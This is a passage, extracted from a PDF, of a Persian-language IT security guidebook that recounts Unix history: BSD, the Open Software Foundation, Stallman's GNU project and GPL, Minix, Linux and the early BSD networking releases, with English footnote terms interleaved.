ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&Tﺷﺪ .ﺷﺎﻳﺪ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺻﻼﺣﺎﺕ ﺑﺮﻛﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺷﺒﻜﻪ ﺑﻮﺩ ،ﻛﻪ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ Unixﺭﺍ ﺑﻪ ﺷﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ
)LANﻫﺎ( ١٠ﺁﺳﺎﻥ ﻣﻲﻛﺮﺩ .ﺑﻪ ﻫﻤﻪ ﺍﻳﻦ ﺩﻻﻳﻞ Unix ،ﻧﺴﺨﺔ ﺑﺮﻛﻠﻲ ﺩﺭ ﺟﻮﺍﻣ ﹺﻊ ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻋﻠﻤﻲ ﺭﻭﺍﺝ ﺑﺴﻴﺎﺭ ﭘﻴﺪﺍ ﻛﺮﺩ.
ﺩﺭ ﺍﻭﺍﺧﺮ ﺳﺎﻟﻬﺎﻱ ۱۹۸۰ﺯﻣﺎﻧﻴﻜﻪ Unixﺍﺯ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻓﻨﻲ ﺑـﻪ ﺑﺎﺯﺍﺭﻫـﺎﻱ ﺗﺠـﺎﺭﻱ ﺭﺍﻩ ﭘﻴـﺪﺍ ﻛـﺮﺩ ،ﻧﺎﺳـﺎﺯﮔﺎﺭﻳﻬﺎﻱ ﻣﻴـﺎﻥ ﻧـﺴﺨﻪﻫـﺎﻱ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ AT&T Unixﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﺒﺘﻨﻲ ﺑﺮ BSD Unixﺷﺮﻭﻉ ﺑﻪ ﺍﻳﺠﺎﺩ ﻣﺸﻜﻼﺕ ﺑﺮﺍﻱ ﻫﻤﺔ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﻤﻮﺩ .ﻣﺸﺘﺮﻳﺎﻥ
ﺗﺠﺎﺭﻱ ﺧﻮﺍﻫﺎﻥ ﻳﻚ ﻧﺴﺨﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ Unixﺑﻮﺩﻧﺪ ،ﺑﻪ ﺍﻳﻦ ﺍﻣﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻣـﻮﺯﺵ ﺭﺍ ﻛـﺎﻫﺶ ﺩﻫﻨـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺳﺎﺧﺘﻪﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻓﺮﻭﺷﻨﺪﻩﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﺑـﺎﺯﺍﺭ ﻧﻮﻇﻬـﻮﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ
ﻲ ﺑﺴﺘﺮﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺭﺍ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺳﺎﺩﻩﺗـﺮ ﻣـﻲﻛﻨـﺪ ﻭ
Unixﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻲﻃﻠﺒﻴﺪ ،ﭼﻮﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺎﻭﺭ ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﺍﻳﻨﻜﺎﺭ ﭘﺸﺘﻴﺒﺎﻧ ﹺ
ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺑﺎﺯﺍﺭ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﻗﺎﺑﺖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺩﺭ ﻣﺎﻩ ﻣﻲ ،۱۹۸۸ﻫﻔﺖ ﺷﺮﻛﺖ ﭘﻴﺸﺮﻭ ﺩﺭ ﺻﻨﻌﺖ - Unixﺭﺍﻳﺎﻧﻪ ﺁﭘﻮﻟﻮ ،١١ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ،١٢ﻫﻴﻮﻟﺖ ﭘﺎﻛﺎﺭﺩ )،IBM ،١٣(HP
١٤
ﻭ ﺳﻪ ﺷﺮﻛﺖ ﺍﺻﻠﻲ ﺍﺭﻭﭘﺎﻳﻲ ﺳﺎﺯﻧﺪﻩ ﻛﺎﻣﭙﻴﻮﺗﺮ -ﺗﺸﻜﻴﻞ ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺎﺯ ) (OSFﺭﺍ ﺍﻋﻼﻡ ﻛﺮﺩﻧﺪ .ﻫﺪﻑ OSFﺑﻴـﺮﻭﻥ ﺁﻭﺭﺩﻥ Unix
ﺍﺯ ﻛﻨﺘﺮﻝ AT&Tﻭ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺁﻥ ﺩﺭ ﺩﺳﺘﺎﻥ ﻳﻚ ﺍﺋﺘﻼﻑ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﺻﻨﻌﺘﻲ ﺑﻮﺩ ،ﻛﻪ ﺑﺎ ﻫﺪﺍﻳﺖ ﺗﻮﺳﻌﺔ Unixﺩﺭ ﺁﻳﻨـﺪﻩ ﻭ ﺩﺭ ﺩﺳـﺘﺮﺱ
ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺁﻥ ﺑﺮﺍﻱ ﻋﻤﻮﻡ -ﺗﺤﺖ ﻳﻚ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺍﺣـﺪ -ﺭﻫﺒـﺮﻱ ﻣـﻲﺷـﺪ OSF .ﺗـﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﺎﻳـﺔ Unixﺧـﻮﺩ ﺭﺍ ﺑﺮﺍﺳـﺎﺱ
١٦
١٥
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ IBMﻗﺮﺍﺭ ﺩﻫﺪ ،ﭘﺲ ﺑﻪ ﺳﻤﺖ ﻫﺴﺘﺔ Unixﻣﺎﺥ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﺭﻧﻲ ﻣﻠﻮﻥ ،ﻛﻪ ﺁﻣﻴﺰﻩﺍﻱ ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﻭ ﺗﺴﻬﻴﻼﺕ HP
ﻭ IBMﻭ ﺷﺮﻛﺖ ﺗﺠﻬﻴﺰﺍﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﻮﺩ ﺣﺮﻛﺖ ﻛﺮﺩ .ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻧﺘﻴﺠﺔ ﺍﻳﻦ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻣﻮﺭﺩ ﭘﺬﻳﺮﺵ ﻭ ﺍﺳﺘﻘﺒﺎﻝ ﮔﺴﺘﺮﺩﻩ ﻭﺍﻗـﻊ ﻧـﺸﺪ،
OSFﺑﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﻴﺸﺘﺮ ﺗﻮﺳﻌﻪﺍﻱ ﺍﺩﺍﻣﻪ ﺩﺍﺩ.
GNU
Berkeley Software Distribution
Local Area Networks
Apollo Computer
Digital Equipment Corporation
Hewlett Packard
Open Software Foundation
Mach
Carnegie Mellon University
Richard Stallman
GNU's Not Unix
9
10
11
12
13
14
15
16
17
18
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺭﻳﭽﺎﺭﺩ ﺍﺳﺘﺎﻟﻤﻦ ١٧ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﭘﺮﻭﮊﻩ LISPﺩﺭ ﺁﺯﻣﺎﻳﺸﮕﺎﻩ ﻫﻮﺵ ﻣﺼﻨﻮﻋﻲ ﺩﺍﻧﺸﮕﺎﻩ ﻭﻗﺘـﻲ ﺩﻳـﺪ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ
ﺭﺳﺎﻧﺪﻥ ﺗﺤﻘﻴﻘﺎﺕ ﺗﺄﺳﻴﺲ ﺷﺪﻩﺑﻮﺩﻧﺪ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﭘﺬﻳﺮﻓﺘﻨﺪ ﻛﻪ ﻣﺎﻧﻊ ﺑﻪ ﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺭﺍﻳﮕﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻮﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺭﺍﺣـﺖ ﺷـﺪ .ﺍﺳـﺘﺎﻟﻤﻦ
ﻣﺘﻮﺟﻪ ﺷﺪ ﻛﻪ ﺍﮔﺮ ﺑﺨﻮﺍﻫﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﻣﻴﺎﻥ ﮔﺮﻭﻩ ﺑﺰﺭﮔﻲ ﺍﺯ ﻣﺮﺩﻡ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﺩ ،ﻧﻤﻲﺗﻮﺍﻧﺪ ﺍﺳـﺎﺱ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ ﺑـﺮ ﺳـﺨﺖﺍﻓـﺰﺍﺭ
ﺧﺎﺻﻲ ﻛﻪ ﺗﻨﻬﺎ ﺗﻮﺳﻂ ﺗﻌﺪﺍﺩ ﻛﻤﻲ ﺍﺯ ﻛﺎﺭﺧﺎﻧﻪﻫﺎﻱ ﺳﺎﺯﻧﺪﻩ ﺳﺎﺧﺘﻪ ﺷﺪﻩ ﺑﻮﺩﻧﺪ ﻭ ﺗﻨﻬﺎ LIPSﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﺮﺩﻧﺪ ﭘﺎﻳﻪﮔـﺬﺍﺭﻱ ﻛﻨـﺪ .ﻟـﺬﺍ ﺑـﻪ
ﺟﺎﻱ ﺍﻳﻨﻜﺎﺭ ﺍﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺍﻧﺠﻤﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ،Unixﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻗﺪﺭﺗﻤﻨﺪ ﻛﻪ ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻢ ﻗﺒﻠـﻲ ﻭ ﻧﻴـﺰ
ﺁﻳﻨﺪﻩﺩﺍﺭ ﺑﻮﺩ ﭘﺎﻳﻪﺭﻳﺰﻱ ﻛﻨﺪ .ﺍﻭ ﻃﺮﺡ ﺧﻮﺩ ﺭﺍ GNUﻧﺎﻣﻴﺪ؛ ﻳﻚ ﻣﺨﻔﻒ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﻋﺒﺎﺭﺕ " Unix GNUﻧﻴـﺴﺖ"! ١٨ﺍﺯ ﻧﻈـﺮ ﺍﺳـﺘﺎﻟﻤﻦ
ﺭﺍﻳﮕﺎﻥ ﺑﻮﺩﻥ ﺗﻨﻬﺎ ﻣﻌﻴﺎﺭ ﻫﺰﻳﻨﻪ ﻧﺒﻮﺩ ،ﺑﻠﻜﻪ ﻳﻚ ﻣﻌﻴﺎﺭ ﺁﺯﺍﺩﻱ ﻫﻢ ﺑﻮﺩ .ﺁﺯﺍﺩ ﺑﻮﺩﻥ ﺑﻪ ﺍﻳﻦ ﻣﻔﻬﻮﻡ ﺑﻮﺩ ﻛﻪ ﺍﻭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺖ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
٢٦٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎﺯﺑﻴﻨﻲ ﻛﻨﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﻧﻤﺎﻳﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﺯﺍﺩ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻧﺴﺨﻪﻫﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻴﺎﻥ ﺩﻭﺳﺘﺎﻧﺶ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕـﺬﺍﺭﺩ.
ﺍﻭ ﺁﺯﺍﺩﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺁﻧﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﺑﻴﺎﻥ ﻣﻄﺮﺡ ﺍﺳﺖ ،ﻧﻪ ﺩﺭ ﺁﺯﺍﺩﻱ ﻣﺸﺮﻭﺑﺎﺕ ﺍﻟﻜﻠﻲ .ﺗﺎ ﺳـﺎﻝ ۱۹۸۵ﺍﻭﻟـﻴﻦ ﻣﺤـﺼﻮﻝ
ﻋﻤﺪﺓ - GNUﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ - Emacsﺑﻪ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺭﺷﺪ ﺭﺳﻴﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺩﻳﮕـﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺍﺳـﺘﺎﻟﻤﻦ ﻫـﻢ ﺑـﻪ
ﺭﺍﺣﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ .ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﺎﻟﻤﻦ ﻛﺎﺭ ﺭﻭﻱ ﻳﻚ ﻛﺎﻣﭙﺎﻳﻠﺮ ﺁﺯﺍﺩ Cﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ؛ .GNU Cﻫﺮﺩﻭﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ
ﻋﻤﻮﻣﻲ ١٩(GPL) GNUﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﺷﺪﻧﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ،ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮﺍﺕ ﺷﺨﺼﻲ ﺭﺍ
ﻣﻲﺩﺍﺩ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻫﻤﺔ ﺗﻐﻴﻴﺮﺍﺕ ﺁﺗﻲ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ،ﺗﺤﺖ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﻫﻤﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻗﺒﻠﻲ ﻣﻨﺘﺸﺮ ﺷـﻮﻧﺪ .ﻫﻤـﺎﻥ ﺳـﺎﻝ ﺍﺳـﺘﺎﻟﻤﻦ
ﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ٢٠ﺭﺍ ﺗﺄﺳﻴﺲ ﻛﺮﺩ؛ ﺑﻨﻴﺎﺩﻱ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻛﻪ ﻫﺪﺍﻳﺎﻱ ﻣﺮﺩﻣﻲ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﺮﺩ ﻭ ﺑﺮﺍﻱ ﺍﺳﺘﺨﺪﺍﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳـﺴﺎﻧﻲ ﻛـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺘﺸﺎﺭ ﻣﺠﺪﺩ ﻣﻲﻧﻮﺷﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﻮﺩ.
Unixﻭ Minix
ﺗﻘﺮﻳﺒﹰﺎ ﺩﺭ ﻫﻤﺎﻥ ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﺳﺘﺎﻟﻤﻦ ﭘﺮﻭﮊﺓ GNUﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ،ﭘﺮﻭﻓﺴﻮﺭ ﺍﻧﺪﺭﻭ ﺍﺱ .ﺗﺎﻧﻨﺒﺎﻡ ٢١ﺗﺼﻤﻴﻢ ﮔﺮﻓـﺖ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺧـﻮﺩﺵ ﺍﺯ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Unixﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﺪﺭﻳﺲ ﻭ ﺗﺤﻘﻴﻖ ﭘﺪﻳﺪ ﺁﻭﺭﺩ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﻮﺷﺘﻪ ﻣﻲﺷﺪ ﺍﻭ ﻣﻲﺗﻮﺍﻧﺴﺖ ﺁﺯﺍﺩﺍﻧﻪ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺧﻮﺩ ﻣﻨﺘﺸﺮ ﻭ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻋﻤﻠﻴﺎﺗﻲ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ ،ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺣﻖ ﺍﻣﺘﻴـﺎﺯﻱ ﺑـﻪ AT&Tﭘﺮﺩﺍﺧـﺖ
ﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﺳﻴﺴﺘﻢ ،Minix ،ﺑﺮ ﺍﺳﺎﺱ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻣﺸﺎﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ IBM PC ATﻋﻤﻞ ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﭘﺮﺩﺍﺯﺷﮕﺮﻫﺎﻱ ﻣﺒﺘﻨـﻲ
ﺑﺮ Intelﻣﺠﻬﺰ ﺑﻮﺩ .ﺍﻳﻦ ﻃﺮﺡ ﻣﻨﺠﺮ ﺑﻪ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﻳﻚ ﺑﺴﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺴﺘﻨﺪﺳﺎﺯﻱﺷﺪﻩ ﻭ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﻋـﺎﻟﻲ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ "ﻛﺎﺭﺁﻣﺪﻱ" ﺩﺭ ﻃﺮﺍﺣﻲ Minixﻳﻚ ﻣﻌﻴﺎﺭ ﺍﺳﺎﺳﻲ ﻧﺒﻮﺩ ،ﻭ ﺍﻳﻦ ﺍﻣﺮ ﺩﺭ ﻛﻨﺎﺭ ﻣﺴﺎﺋﻞ ﺭﻋﺎﻳﺖ ﺣﻖ ﻛﭙـﻲ ﻣﺮﺑـﻮﻁ
ﺑﻪ ﻛﺘﺎﺏ ﺩﺭﺳﻲ ﺑﺎﻋﺚ ﺷﺪ Minixﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺭﻭﺯﻣﺮﻩ ﺩﺭ ﮔﺴﺘﺮﺓ ﻭﺳﻴﻊ ،ﮔﺰﻳﻨﺔ ﺧﻮﺑﻲ ﺍﺯ ﺁﺏ ﺩﺭﻧﻴﺎﻳﺪ.
ﺩﺭ ﺳﺎﻝ ۱۹۹۱ﻳﻚ ﺩﺍﻧﺸﺠﻮﻱ ﻋﻠﻮﻡ ﺭﺍﻳﺎﻧﺔ ﻓﻨﻼﻧﺪﻱ ﺑﻪ ﻧﺎﻡ ﻟﻴﻨﻮﺱ ﺗﺮﻭﺍﻟﺪﺯ ٢٢ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﻳﻚ ﻧﺴﺨﺔ ﺁﺯﺍﺩ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ Unixﻛـﻪ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺭﻭﺯﻣﺮﻩ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎﺷﺪ ﭘﺪﻳﺪ ﺁﻭﺭﺩ .ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺷﺮﻭﻉ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ،Minixﮔﺎﻡ ﺑﻪ ﮔﺎﻡ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ﻭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺩﻭﺑـﺎﺭﻩ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻛﻪ ﻫﻴﭽﻴﻚ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺗﺎﻧﻨﺒﺎﻡ ﺩﺭ ﺁﻥ ﻧﺒﻮﺩ .ﺗﺮﻭﺍﻟﺪﺯ ﺳﻴﺴﺘﻢ ﺑﺪﺳﺖ ﺁﻣـﺪﻩ
ﺭﺍ " "Linuxﻧﺎﻣﻴﺪ ﻭ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺖ ﺁﻧﺮﺍ ﺗﺤﺖ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ GPLﺍﺳﺘﺎﻟﻤﻦ ﺗﻮﺯﻳﻊ ﻛﻨﺪ .ﺗﺮﻭﺍﻟﺪﺯ ﺑﺎ ﺗﺮﻛﻴﺐ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑـﺎ ﺳـﺎﻳﺮ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﺭﺍﻳﮕﺎﻥ ﻣﻮﺟﻮﺩ ﺧﺼﻮﺻﹰﺎ ﻛﺎﻣﭙﺎﻳﻠﺮ Cﻭ ﻭﻳﺮﺍﻳﺸﮕﺮ ﻣﺘﻦ GNUﺑﻨﻴﺎﺩ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Windowsﻛﻨﺴﺮﺳﻴﻮﻡ ،Xﺗﻮﺍﻧـﺴﺖ
ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻛﺎﻣﻞ ﻭ ﻋﻤﻠﻴﺎﺗﻲ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﻛﺎﺭ ﺭﻭﻱ Linuxﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺗﻮﺳﻂ ﺻﺪﻫﺎ ﻛﻤﻚﻛﻨﻨﺪﻩ ﻫﻤﭽﻨﺎﻥ ﺍﺩﺍﻣﻪ ﺩﺍﺭﺩ.
NetBSD, FreeBSD, OpenBSD
٢٣
ﺩﺭ ﺳﺎﻝ ۱۹۸۸ﮔﺮﻭﻩ ﺗﺤﻘﻴﻘﺎﺕ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﻛﻠﻲ ) (CSRGﻃﺮﺣﻲ ﺭﺍ ﺑﺮﺍﻱ ﺣﺬﻑ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ AT&Tﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ
ﺧﻮﺩ ﺷﺮﻭﻉ ﻛﺮﺩ" .ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺍﻭﻝ" ﻛﻪ ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﮊﻭﺋﻦ ۱۹۸۹ﺁﻣﺎﺩﻩ ﺷﺪﻩ ﺑﻮﺩ ﺷـﺎﻣﻞ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺑﺮﻛﻠـﻲ ﺍﺯ
TCP/IPﻭ ﺗﺴﻬﻴﻼﺕ ﻣﺮﺑﻮﻃﻪ ﻣﻲﺷﺪ .ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﻪ ﺑﻬﺎﻱ ۱۰۰۰ﺩﻻﺭ ﺭﻭﻱ ﻧﻮﺍﺭ ﺿﺒﻂ ﺗﻮﺯﻳﻊ ﺷﺪ ،ﻭ ﻫﺮ ﻛﺲ ﻛـﻪ ﺁﻥ ﺭﺍ ﺧﺮﻳـﺪﺍﺭﻱ
ﻣﻲﻛﺮﺩ ﻣﺠﺎﺯ ﺑﻮﺩ ﻫﺮ ﺗﻐﻴﻴﺮﻱ ﻛﻪ ﻣﻲﺧﻮﺍﺳﺖ ﺭﻭﻱ ﺑﺮﻧﺎﻣﻪ ﺁﻥ ﺍﻧﺠﺎﻡ ﺩﻫﺪ ،ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻣﺤﺪﻭﺩﻳﺖ ﺣﻖ ﺍﻧﺘﺸﺎﺭ ﺍﺻﻠﻲ ﻣﺤﻔـﻮﻅ ﺑﻤﺎﻧـﺪ.
ﭼﻨﺪ ﺑﺮﻧﺎﻣﺔ ﺑﺰﺭﮒ ﺑﺮﻧﺎﻣﻪ FTPﻧﺎﺷﻨﺎﺱ ٢٤ﺭﺍ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩﻧﺪ؛ ﻭ ﺑﺮﻧﺎﻣﺔ ﺑﺮﻛﻠﻲ ﺑﺴﺮﻋﺖ ﺗﺒﺪﻳﻞ ﺑﻪ ﻣﺒﻨﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱﻫـﺎﻱ
TCP/IPﺩﺭ ﺳﺮﺍﺳﺮ ﺻﻨﻌﺖ ﺷﺪ .ﻳﻚ ﻣﺤﺼﻮﻝ ﻣﻮﻗﺖ ﻣﻮﺳﻮﻡ ﺑﻪ 4.3BSD Renoﺩﺭ ﺍﻭﺍﻳـﻞ ﺳـﺎﻝ ۱۹۹۰ﻭ ﻣﺤـﺼﻮﻝ ﻣﻮﻗـﺖ ﺩﻭﻡ،
"ﻣﺤﺼﻮﻝ ﺷﺒﻜﻪﺳﺎﺯﻱ ﻧﮕﺎﺭﺵ ﺩﻭﻡ" ،ﺩﺭ ﮊﻭﺋﻦ ۱۹۹۱ﺑﻮﺟﻮﺩ ﺁﻣﺪ .ﺍﻳﻦ ﻣﺤﺼﻮﻝ ،ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻛﺎﻣـﻞ ﺑـﻮﺩ ﻣﮕـﺮ ﺑـﺮﺍﻱ ۶ﻓﺎﻳـﻞ
GNU General Public License
Free Software Foundation
Andrew S. Tanenbaum
Linus Torvalds
Berkeley Computer Systems Research Group
FTP Anonymous Connection
19
20
21
22
23
24
٢٦١
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
